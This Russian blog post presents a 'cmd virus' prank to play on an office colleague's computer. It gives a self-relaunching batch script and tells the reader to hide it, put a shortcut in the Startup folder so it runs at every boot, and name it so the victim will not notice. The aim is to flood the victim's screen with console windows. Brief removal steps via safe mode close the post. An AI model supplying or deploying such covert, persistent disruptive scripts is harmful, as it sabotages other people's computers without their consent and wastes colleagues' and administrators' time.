Вирус cmd . Командная консоль мешает работе.

Вирус cmd

Всем привет, и с вами вновь Компьютер76, который в очередной раз поможет вам в том, чтобы вы смогли провести приятно время, наблюдая за тщетными попытками коллег и пришедших им на подмогу администраторов исправить зловредный вирус, проникший в систему вашего соседа по офису или сослуживца, пользующимся компьютером. Если ваши зубы ещё целые или в офисе остались сотрудники, которые не подозревают о ваших компьютерных способностях, то позволю предложить вам очередной компьютерный трюк, который будет выглядеть как огромное количество окон консолей команд. Что-то похожее уже было, но ещё одна компьютерная пакость в вашей коллекции не повредит. Сегодня рассмотрим вирус cmd , который заключается в открытии огромного количества окон командной консоли на Рабочем столе монитора жертвы.

Вирус cmd

Итак, создадим вирус cmd через пустой документ в Блокноте. Введём в него следующий код:

@echo off

Copy C:\Programs\something.bat C:\Programs

Start C:\Programs\something.bat

Сохраните документ под названием, например, something с расширением, как вы догадались, .bat.

Теперь необходимо создать в диске С папку под названием, например, Programs . Название папки произвольно, можно выбрать своё, которое, впрочем, не привлечёт особого внимания у невнимательного пользователя. Но если вы введёте своё имя, проследите, чтобы оно совпало с именем папки в написании кода в документе Блокнота.

Скопируйте вирус cmd и поместите его в созданную папку Programs . Можно затем скрыть вирус cmd , установив в свойствах файла галочку напротив Скрытый, но сначала…

…поместите ярлык от вируса в папку Автозагрузки системы. Она, как вы знаете, находится в Пуск – Все программы – Автозагрузка. Теперь вирус cmd будет загружаться вместе с системой. Сразу после запуска монитор заполнится огромным и бесконтрольным количеством самозапускающихся окон консоли команд.

Чтобы избавиться от этой пакости, нужно будет загрузиться в безопасном режиме и убрать поочерёдно ярлык вируса из папки Автозагрузки, затем и сам файл, удалив созданную папку Programs .

Успехов

Ещё компьютерные приколы…

Один ответ на “Вирус cmd . Командная консоль мешает работе.”

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Максимальный размер загружаемого файла: 50 МБ. Вы можете загрузить: изображение, видео. Ссылки на YouTube, Facebook, Twitter и другие сервисы, вставленные в текст комментария, будут автоматически встроены. Перетащите файлы сюда